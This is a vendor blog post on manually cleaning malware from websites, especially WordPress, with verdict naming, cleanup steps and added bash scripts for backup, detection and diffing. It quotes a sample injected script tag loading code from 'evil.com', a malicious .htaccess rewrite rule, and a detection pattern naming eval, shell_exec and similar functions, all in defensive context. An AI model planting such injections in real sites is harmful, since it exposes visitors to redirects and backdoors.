Imunify360 Blog

Manual malware cleanup

Written by Andrey Kucherov | Dec 12, 2023 1:00:00 PM

How to clean a website? How to remove malware? If ImunifyAV, the Linux server antivirus, reports that malware has been found, the guidelines below describe how the infection can be cleaned up manually:


Step 1: Backup

Before cleaning the website, it is highly recommended to make a full backup of everything that will be touched during the cleanup, stored outside the webroot. For a WordPress-based website, for example, make sure that the backup covers not only the files but the database as well: injections (redirects, spam links, rogue admin users) live in the database too, and a cleanup that goes wrong must be reversible.
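As an added example (not code from the original post or from Imunify), the following shell script performs the file and database backup for a WordPress site from the Linux CLI. The webroot and backup directory are assumptions passed as arguments; the database credentials are read from wp-config.php and handed to mysqldump through a temporary defaults file so the password never appears on the command line or in the shell history.

```bash
#!/usr/bin/env bash
# Added example (not from the Imunify360 post): back up a WordPress site's
# files and database before touching anything. Paths are assumptions.
set -u

# Print the value of define('KEY', 'value') from wp-config.php (first match).
# Values containing quote characters are not handled; adjust by hand if so.
wp_config_value() {            # usage: wp_config_value /path/wp-config.php DB_NAME
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$1" | head -n 1
}

# Archive the whole webroot (hidden files included) into OUTDIR with a
# timestamp and print the archive path. OUTDIR must be outside the webroot so
# the infected copy can never be served or re-included by the site.
backup_files() {               # usage: backup_files /var/www/html /root/backups
    webroot=$1 outdir=$2
    mkdir -p "$outdir"
    archive="$outdir/files-$(date +%Y%m%d-%H%M%S).tar.gz"
    tar -czf "$archive" -C "$webroot" .
    printf '%s\n' "$archive"
}

# Dump the WordPress database using the credentials found in wp-config.php.
# The credentials go through a temporary --defaults-extra-file (mode 600) so
# the password is not visible in `ps` output. DB_HOST given as host:port is
# split; a socket path in DB_HOST is not handled here.
backup_db() {                  # usage: backup_db /var/www/html /root/backups
    webroot=$1 outdir=$2
    cfg="$webroot/wp-config.php"
    db=$(wp_config_value "$cfg" DB_NAME)
    user=$(wp_config_value "$cfg" DB_USER)
    pass=$(wp_config_value "$cfg" DB_PASSWORD)
    host=$(wp_config_value "$cfg" DB_HOST)
    [ -n "$db" ] || { echo "no DB_NAME in $cfg" >&2; return 1; }
    mkdir -p "$outdir"
    extra=$(mktemp)
    chmod 600 "$extra"
    printf '[client]\nuser=%s\npassword=%s\n' "$user" "$pass" > "$extra"
    case $host in
        *:*) printf 'host=%s\nport=%s\n' "${host%%:*}" "${host#*:}" >> "$extra" ;;
        *)   printf 'host=%s\n' "$host" >> "$extra" ;;
    esac
    dump="$outdir/db-$db-$(date +%Y%m%d-%H%M%S).sql"
    mysqldump --defaults-extra-file="$extra" --single-transaction "$db" > "$dump"
    status=$?
    rm -f "$extra"
    [ "$status" -eq 0 ] && printf '%s\n' "$dump"
    return "$status"
}

# Stand-alone use: ./backup.sh /var/www/html /root/backups
if [ "$#" -eq 2 ]; then
    backup_files "$1" "$2" && backup_db "$1" "$2"
fi
```

Keep the resulting archive and dump off the server as well (scp them to a workstation or object storage): if the attacker still has a shell, a backup on the same host can be tampered with or wiped.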

Step 2: Understand What the Malware Is

First of all, all Imunify products follow a common malware classification convention. Here are a few brief classification examples:

 

Malware type | Detection type | ID      | filetype.category.classification | Version
SMW          | INJ            | 16402   | js.spam.redi                     | 18
CMW          | SA             | 12147   | mlw.wshll                        | 5
SMW          | BLKH           | 1246640 | php.bkdr.anonfox.autoast         | 1

These fields are joined with hyphens into the verdict string shown in alerts, for example SMW-INJ-16402-js.spam.redi-18.

 

SMW stands for Server Malware: the malicious code executes on the server side. CMW stands for Client Malware: the malicious code executes on the client's side, e.g. in the browser.

INJ - malicious code was injected into an otherwise legitimate file; only the injected part has to be removed.

SA and BLKH - standalone malware file; the whole file is malicious.

 

Imunify360 can also clean up malware stored in the database. Its Malware Database Scanner (MDS) cleans up arbitrary redirects, spam/phishing content and PHP/JS malware kept in database tables. The regular file signatures also work on database content, and in addition MDS may report CMW-URL-* detections: signatures based on Imunify360's own database of malicious URLs, a global threat intelligence database.

 

Step 3: Malware Removal

Manual malware removal requires some basic knowledge of the command line and of programming. Alternatively, Imunify360 can handle malware removal in seconds while keeping the server reliable.

 

Step 3.1: Removal of Standalone Malware

If a file is flagged by an -SA- or -BLKH- signature, it is malicious in its entirety and can be removed completely using the control panel file manager or the Linux CLI (but see the warning about inclusions at the end of this step first).

Here are the top standalone malware verdicts:

 

SMW-SA-15778-php.bkdr.wshll.wpnull24

SMW-SA-12273-mlw.drwy

SMW-SA-15255-php.bkdr.wshll.wpnull24

SMW-SA-04892-php.bkdr.wpvcd

SMW-SA-17965-php.bkdr.wp.fake

SMW-SA-15534-php.bkdr.drpr.wpnull24

SMW-SA-12883-mlw.phish

SMW-SA-13119-mlw.tool.spam.wpvcd

SMW-SA-15256-php.bkdr.wshll

SMW-SA-13600-php.phish.gen

SMW-SA-16489-php.deface.gen

SMW-SA-15618-php.bkdr.fakeplugin.wpvcd

SMW-SA-12609-mlw.deface

SMW-BLKH-74202-elf.trojan

SMW-BLKH-20827-php.spam

SMW-BLKH-33002-html.phish

 

Figure 1 - Standalone malware alert

 

Backdoors

Standalone malware often spreads as part of a nulled (pirated) popular theme or plugin.

Figure 2 - Standalone backdoor in nulled theme

 

The figure above shows part of a standalone backdoor bundled with a nulled website template, flagged by SMW-SA-15255-php.bkdr.wshll.wpnull24.

 

Phishing

Another common kind of standalone malicious file is a phishing page. Phishing infections are almost always standalone files. Here is an example that mimics a Google sign-in form, flagged as SMW-SA-18231-html.phish:

Figure 3 - Standalone phishing file

Hacking Tools

The screenshot below shows part of a standalone PHP hacking toolkit produced by the AnonymousFox group; it is flagged as SMW-BLKH-1246640-php.bkdr.anonfox.autoast.

Figure 4 - AnonymousFox hacking tool

Fake Favicon

The listing below shows fake favicon (.ico) files that contain malicious code rather than an icon image. The .ico extension is chosen so that the file looks like a harmless static asset in a directory listing; the file is then loaded by an include statement elsewhere on the site.

Top standalone malware file locations cloaking as .ico: 

wp-content/.102ab028.ico

wp-includes/js/codemirror/.903876dc.ico

sites/favicon_3bedeb.ico

favicon_1c9d85.ico

wp-content/uploads/2015/02/init.locked.ico

wp-includes/apache.ico

cgi-bin/.a3269f8f.ico

wp-content/themes/twentyfourteen/suspected.client.ico

components/cookie.http.ico

wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/clases.session.ico

public_html/favicon.ico

public_html/fav.ico

wp-includes/js/tinymce/themes/css.db.ico

httpdocs/path/modes.session.ico

public_html/favicon11.ico

/sites/default/files/favicon.src.ico

/uploads/suspected.system.ico
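The following shell functions are an added example (not code from the original post or from Imunify) that finds such fake favicons by content rather than by name: a real .ico file starts with the bytes 00 00 01 00, so any .ico under the webroot that lacks that header, or that contains a PHP open tag, is reported. The webroot path is an assumption passed as an argument.

```bash
#!/usr/bin/env bash
# Added example (not from the Imunify360 post): find .ico files under a webroot
# that are really scripts. A genuine Windows icon begins with the 4-byte header
# 00 00 01 00; a file without it, or one containing a PHP open tag, is suspect.

# Return 0 if FILE begins with the ICO magic bytes, 1 otherwise.
has_ico_magic() {
    [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "00000100" ]
}

# Return 0 if FILE contains a PHP open tag: <?php, <?= or <? followed by
# whitespace. Some droppers prepend a valid icon header, so both checks run.
has_php_tag() {
    grep -qE '<\?(php|=|[[:space:]])' "$1"
}

# Print every *.ico under WEBROOT that fails the magic check or contains PHP.
# Hidden names such as .102ab028.ico are matched too; find does not skip them.
find_fake_ico() {              # usage: find_fake_ico /var/www/html
    find "$1" -type f -iname '*.ico' -print | while IFS= read -r f; do
        if ! has_ico_magic "$f" || has_php_tag "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Stand-alone use: ./find_fake_ico.sh /var/www/html
if [ "$#" -eq 1 ]; then
    find_fake_ico "$1"
fi
```

The same idea (extension says image, content says script) applies to .png, .jpg and .txt files dropped into uploads directories; the magic bytes differ per format, but the grep for a PHP open tag is the same.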

 

Warning!

In some cases a standalone malware file is pulled in by an include or require statement that malware injected into a legitimate file on the website. If so, removing the standalone file turns every request that includes it into a fatal PHP error: the visitor gets a 5xx server-side error or a White Screen Of Death (WSOD). To be on the safe side it is mandatory to search the website webroot for any such inclusions before deleting the file. Here is an example of a CLI command to search for non-obfuscated WP-VCD malware inclusion instructions:

grep -rl --include=*.php -e "class.plugin-modules.php" -e "class.theme-modules.php" -e "wp-vcd.php" -e "wp-tmp.php" .

This command searches the code of all PHP files below the current directory and prints the names of the files that mention any of the detected standalone malware files (drop -l to see the matching lines). Note that an obfuscated inclusion, where the filename is assembled from string fragments or decoded at runtime, will not match a plain grep; the diff approach described in Step 3.2 catches those.

Alternatively, a standalone malicious file can be truncated to zero bytes instead of being removed, so that any left-over inclusion of it does not cause a fatal error.
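Here is an added example (not the post's or Imunify's own code) that automates the check above for any flagged standalone file: it searches the webroot for PHP files that mention the file's name, keeps a copy in a quarantine directory, and then either removes the file or, if something still includes it, empties it instead. The webroot, file and quarantine paths are assumptions passed as arguments.

```bash
#!/usr/bin/env bash
# Added example (not from the Imunify360 post): neutralise a standalone
# malicious file without breaking the site. If any other PHP file references
# it, the file is truncated to zero bytes instead of deleted, so a left-over
# include/require does not become a fatal error (5xx / white screen).

# Print PHP files under WEBROOT (other than FILE itself) whose source mentions
# FILE's basename, e.g. require_once 'class.theme-modules.php'.
find_includers() {             # usage: find_includers /var/www/html /var/www/html/wp-content/plugins/mplugin.php
    webroot=$1 target=$2
    base=$(basename "$target")
    grep -rl --include='*.php' -F -e "$base" "$webroot" | grep -vxF "$target"
}

# Copy FILE into QUARANTINE (mode 600, outside the webroot) for later analysis,
# then remove it if nothing includes it, otherwise empty it. Prints the action.
neutralise_standalone() {      # usage: neutralise_standalone WEBROOT FILE QUARANTINE
    webroot=$1 target=$2 quarantine=$3
    mkdir -p "$quarantine"
    copy="$quarantine/$(basename "$target").$(date +%s)"
    cp -p "$target" "$copy"
    chmod 600 "$copy"
    if [ -n "$(find_includers "$webroot" "$target")" ]; then
        : > "$target"
        printf 'emptied %s (still referenced by other PHP files)\n' "$target"
    else
        rm -f "$target"
        printf 'removed %s\n' "$target"
    fi
}

# Stand-alone use: ./neutralise.sh /var/www/html /var/www/html/wp-content/plugins/mplugin.php /root/quarantine
if [ "$#" -eq 3 ]; then
    neutralise_standalone "$1" "$2" "$3"
fi
```

The quarantine copy matters for two reasons: the file can be compared with other findings later, and it documents what was removed if the cleanup has to be audited. An emptied file should still be noted so that the including file (itself infected) is cleaned in Step 3.2 and the empty stub removed afterwards.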

 

Step 3.2: Removal of Injected Malware

Injected malware is a bit more tricky. Such detections carry -INJ- in the verdict, and only the injected part of the file must be removed, not the whole file. Several kinds of injections are reviewed below, together with what can be done to clean them out manually.

Figure 5 - Redirecting JavaScript injection flagged as SMW-INJ-18422-js.spam.redi

Redirecting Injections


Top 10 redirecting malware verdicts:

SMW-INJ-16270-js.spam.redi

SMW-INJ-18008-js.spam.redi

SMW-INJ-17803-php.spam.drwy

SMW-INJ-16402-js.spam.redi

SMW-INJ-17738-js.spam.redi

SMW-INJ-17896-js.spam.redi

SMW-INJ-03990-html.drwy

SMW-INJ-04270-htcss.mlw

SMW-INJ-15453-js.spam.redi

SMW-INJ-18223-js.spam.redi


Redirecting malware usually sends website visitors to spam sites: pharma, adult or phishing pages. Some variants also try to exploit vulnerable client software (browser, plugins) and compromise the visitor's system.

Figure 6 - .htaccess malware alert

Here is a list of the most common redirection types:

  • Redirection hack in .htaccess. Example of a redirect based on an injected .htaccess rewrite rule (any request whose path contains a comma is rewritten to a PHP file named after the part following the comma, with the original path passed along as parameters):

RewriteRule ^(.*),(.*)$ $2.php?rewrite_params=$1&page_url=$2

Another example is shown in the following figure.

Figure 7 - redirecting .htaccess injection flagged by SMW-INJ-18736-htaccess.spam.redi

  • Redirection hidden in CMS core files. Usually it is hidden in wp-config.php. Sometimes redirecting malware injections are hidden in other core files like index.php, header.php, footer.php, wp-load.php, etc.
  • JavaScript redirection malware infects JavaScript (.js) files or injects redirecting scripts into PHP files.
    Example: SMW-INJ-16402-js.spam.redi-18

Figure 8 - JavaScript redirection malware alert

 

Mitigation: 

  1. Identify the malware code inside the file. Sometimes it is pretty straightforward; in other cases the injection might be hidden.
    Different approaches are possible here, for example:
    • comparing with old clean backups,
    • comparing with the original repository/vendor package of the CMS, theme, plugin or template (the same version that is installed).

    In most cases it is also possible to identify a malicious injection visually:

    • obfuscated code inside of regular code (base64 blobs, hex escapes, function names assembled from string fragments),
    • a formatting style different from the rest of the file,
    • very long lines with no line breaks (CR LF symbols), often at the very top or bottom of the file.
  2. Clean out the malware using a control panel file manager or the Linux CLI.
    The example below shows a malicious redirection link injected as a script tag that loads a remote JavaScript file. 
    <script type='text/javascript' src='evil.com/y.js'></script>

    Using vi, vim, emacs or nano from the CLI, the injected tag can be removed. Here 'evil.com' stands for a malicious redirecting domain. Removing the whole <script> tag is the cleanest fix; if only the domain is removed, an empty tag is left behind, which loads nothing but still marks where the injection was:

    <script type='text/javascript' src=''></script>

    Of course, the injection might be much more complicated and the amount of code that has to be removed may vary. The following command
    $ php -l target_file.php
    can be used to make sure that the PHP syntax was not broken by the injection removal; a file with a syntax error causes a 5xx error or a white screen on every request that loads it.

  3. If the malware injection was in the .htaccess file, it might be hard, in some cases, to identify the start and the end of the injection. Incorrect removal of the injection might also break the syntax of the .htaccess file and lead to a website malfunction. To avoid such issues during .htaccess cleanup, it is recommended to restore it from a clean backup taken before the infection appeared, or to use the vendor's default for the CMS in use. For example, the default WordPress .htaccess rules are documented on wordpress.org, and Joomla! ships a reference htaccess.txt in its installation package.

Hidden Backdoors


Top 10 verdicts of injected backdoors:

SMW-INJ-03431-php.bkdr.eval.oneliner

SMW-INJ-15535-php.bkdr.incl.wpnull24

SMW-INJ-14070-php.bkdr

SMW-INJ-04278-php.bkdr

SMW-INJ-03933-php.bkdr

SMW-INJ-06044-php.bkdr.wpvcd

SMW-INJ-17722-php.bkdr.exec

SMW-INJ-12444-php.bkdr

SMW-INJ-13122-php.bkdr.wp.remote

SMW-INJ-03548-php.bkdr

 

Usually, dangerous PHP functions such as eval, create_function, base64_decode or file_get_contents (used to fetch remote code), found in files located in wp-includes, images, uploads or other locations not designed for direct PHP code execution, indicate a malware injection. It can also be a CMS-specific insert, such as a function that drops an additional admin user or lets the attacker log in automatically as administrator.
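As an added example (not code from the original post or from Imunify), the following shell functions implement that heuristic: one lists PHP files placed in directories that should only hold static content, the other greps every PHP file for dangerous constructs. The directory list and the regular expression are assumptions to adapt to the site, and CMS core files will produce some false positives (WordPress itself uses base64_decode in places), which should be settled by comparing the file with a clean copy.

```bash
#!/usr/bin/env bash
# Added example (not from the Imunify360 post): heuristic search for injected
# backdoors. Two checks: (1) PHP files in directories meant for static content
# only; (2) dangerous functions and variable-variable tricks in PHP source.

# Directories (relative to the webroot) that should never contain PHP.
# Assumption: adjust to the CMS in use.
NO_PHP_DIRS='wp-content/uploads wp-content/cache images'

# Constructs that rarely appear in legitimate theme/plugin code:
#  - eval/assert/create_function and the shell family, called directly;
#  - decoders typically wrapped around eval (base64_decode, gzinflate, ...);
#  - $$name and ${"..."} variable variables that hide the real function name.
# A preceding non-identifier character avoids matching e.g. retrieval(.
DANGEROUS_RE='(^|[^a-zA-Z0-9_])(eval|assert|create_function|system|passthru|shell_exec|exec|popen|proc_open|str_rot13|gzinflate|gzuncompress|base64_decode)[[:space:]]*\(|\$\$[a-zA-Z_]|\$\{"'

# 1) PHP files (by extension, including .phtml and .php5-style names) found
#    inside static-content directories under WEBROOT.
php_in_static_dirs() {         # usage: php_in_static_dirs /var/www/html
    for d in $NO_PHP_DIRS; do
        [ -d "$1/$d" ] || continue
        find "$1/$d" -type f \( -iname '*.php' -o -iname '*.phtml' -o -iname '*.php[0-9]' \) -print
    done
}

# 2) PHP files under WEBROOT containing a dangerous construct. Prints
#    "path:line:text" so each hit can be opened at the right line in an editor.
dangerous_calls() {            # usage: dangerous_calls /var/www/html
    grep -rnE --include='*.php' -e "$DANGEROUS_RE" "$1" || true
}

# Stand-alone use: ./backdoor_hunt.sh /var/www/html
if [ "$#" -eq 1 ]; then
    php_in_static_dirs "$1"
    dangerous_calls "$1"
fi
```

Treat the output as a worklist, not a verdict: a hit in wp-content/uploads is almost certainly malicious, while a hit in wp-includes needs a diff against the vendor copy of the same version before anything is deleted.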

 

Figure 9 - Alert for backdoor found wp-includes

 

Figure 10 - Backdoor in vim editor

 

The example above shows a WordPress-targeted backdoor that lets attackers log in to the administrator panel automatically. Unfortunately, it is not always easy to identify a backdoor visually. If clean source files of the software are available, `diff` in the server CLI or an online tool such as diffnow can be used to identify the injected code:

Figure X - Difference between the file infected by a backdoor and clean file

Mitigation: 

Cleanup for such injections is similar to the previous section: remove the malicious inserts either with the file manager of the control panel or with any preferred CLI editor, then check the file with php -l.
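The following added example (not code from the original post or from Imunify) automates the comparison for both the redirect injections of Step 3.2 and the hidden backdoors above: compare_with_clean lists files that were modified (M), added (A) or deleted (D) relative to a clean copy of the same software, and php_lint_list runs php -l over the files edited afterwards. Paths are assumptions; the clean copy must be the exact version that is installed, otherwise every file shows up as modified.

```bash
#!/usr/bin/env bash
# Added example (not from the Imunify360 post): compare an installed theme,
# plugin or CMS core tree against a clean copy of the same version, then
# syntax-check every file that was edited. Modified files are where injections
# live; files present only on the server are candidates for dropped backdoors.

# Print "M path" for files that differ from CLEAN, "A path" for files that exist
# only under SITE and "D path" for files missing from SITE (paths relative to
# the tree). Identical files are not printed.
compare_with_clean() {         # usage: compare_with_clean /tmp/clean/twentytwenty /var/www/html/wp-content/themes/twentytwenty
    clean=${1%/} site=${2%/}
    diff -rq "$clean" "$site" | while IFS= read -r line; do
        case $line in
            *" and "*" differ")              # "Files X and Y differ" / "Binary files X and Y differ"
                p=${line#*"$clean/"}; p=${p%% and *}
                printf 'M %s\n' "$p" ;;
            "Only in $site"*)                # "Only in DIR: name" on the server side
                rest=${line#"Only in "}; dir=${rest%%: *}; name=${rest#*: }
                rel=${dir#"$site"}; rel=${rel#/}
                printf 'A %s\n' "${rel:+$rel/}$name" ;;
            "Only in $clean"*)               # present in the clean copy only
                rest=${line#"Only in "}; dir=${rest%%: *}; name=${rest#*: }
                rel=${dir#"$clean"}; rel=${rel#/}
                printf 'D %s\n' "${rel:+$rel/}$name" ;;
        esac
    done
}

# Run `php -l` on every PHP file named on stdin (one path per line). Prints the
# failures and returns 1 if any file has a syntax error, e.g. an injection
# that was cut out carelessly.
php_lint_list() {              # usage: printf '%s\n' header.php footer.php | php_lint_list
    rc=0
    while IFS= read -r f; do
        case $f in *.php) ;; *) continue ;; esac
        if ! php -l "$f" >/dev/null 2>&1; then
            printf 'SYNTAX ERROR: %s\n' "$f"; rc=1
        fi
    done
    return $rc
}

# Stand-alone use: ./compare.sh /tmp/clean/theme /var/www/html/wp-content/themes/theme
if [ "$#" -eq 2 ]; then
    compare_with_clean "$1" "$2"
fi
```

A typical session: unpack the vendor zip of the installed version into /tmp, run compare_with_clean, inspect each M file with diff and each A file by hand, edit, and finally feed the edited paths through php_lint_list before reloading the site. A D entry is not malware, but a missing core file can explain a broken site after an earlier, rougher cleanup.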

 

Figure 11 - Beginning of redirecting PHP injection inside nulled theme file flagged by SMW-INJ-13960-php.bkdr.wpvcd

Nulled Themes Malware


Top nulled theme verdicts (some are standalone files, some are injections):

SMW-INJ-15535-php.bkdr.incl.wpnull24

SMW-SA-04892-php.bkdr.wpvcd

SMW-INJ-15539-php.bkdr.incl.wpnull24

SMW-INJ-12809-php.bkdr.wpvcd

SMW-INJ-06044-php.bkdr.wpvcd

SMW-INJ-03674-php.bkdr.wpvcd

SMW-INJ-13126-php.bkdr.wpvcd

SMW-SA-18218-php.bkdr.wpvcd

SMW-INJ-13129-php.bkdr.wpvcd

 

A sizeable share of the modern malware landscape comes from injections in nulled (cracked) premium CMS templates. Very often such injections look similar to normal WordPress theme code.

Figure 12 - WPVCD infection alert for WordPress core file

 

Here the injection itself looks pretty benign:

Figure 13 - WPVCD injection that executes an additional file that contains a backdoor


Top 10 locations of included backdoor files (some of them are standalone malware, others are injected into legitimate files):

/wp-content/plugins/mplugin.php

/wp-content/themes/exampletheme/class.theme-modules.php

/wp-content/plugins/xmplplgn/functions/class.plugin-modules.php

/assets/.default

/wp-includes/js/tinymce/themes/themes.php

/wp-admin/css/colors/colors.php

/wp-content/uploads/2021/08/xuipenhd.php

/wp-content/uploads/woocommerce_uploads/ytxpdvte.php

/wp-content/plugins/monit.php

/modules/mod_wrapper/nepetfzv.php

 

Nulled themes quite often carry a massive number of backdoor injections in almost every file they contain. Cleaning all of them manually takes time, or requires some scripting skills to automate the work.

Mitigation

Cleaning a nulled theme manually might be tricky, since a clean version of the software may not be available and in some cases it is hard to tell which code is injected. The best option is to restore the website from a backup taken before the theme was installed and to replace the theme with a clean, legitimately obtained version. Alternatively, follow the steps described above for standalone and injected malware to clean up the files manually.

Step 4: Repeat

Finally, after the cleanup is done, rescan the website and make sure no malware remains. If something is still detected, repeat the steps of this guide starting from Step 2.

Step 5: Secure

After the cleanup is completed, harden the website so the infection does not happen again: update the CMS, themes and plugins, remove nulled software, rotate all passwords and database credentials that the attacker could have read from wp-config.php, and keep a scanner running.

 

Conclusion

This article covers more than 50% of infection cases that the Imunify malware processing team saw during the last month. Naturally, there could be other even more complex variations of infections. A description of how to remove such malware just couldn’t fit into a blog article. Regardless of whether it is a typical infection or rare case - ImunifyAV+ could handle any of those malicious files. Please consider ImunifyAV+ as your tool of choice to fight malicious infections - it provides the built-in, one-click cleanup feature. Or get it as part of Imunify360's complete and comprehensive website security solution, which also includes an intelligent WAF, IDS and IPS, Proactive Defense, automated kernel patch management and more.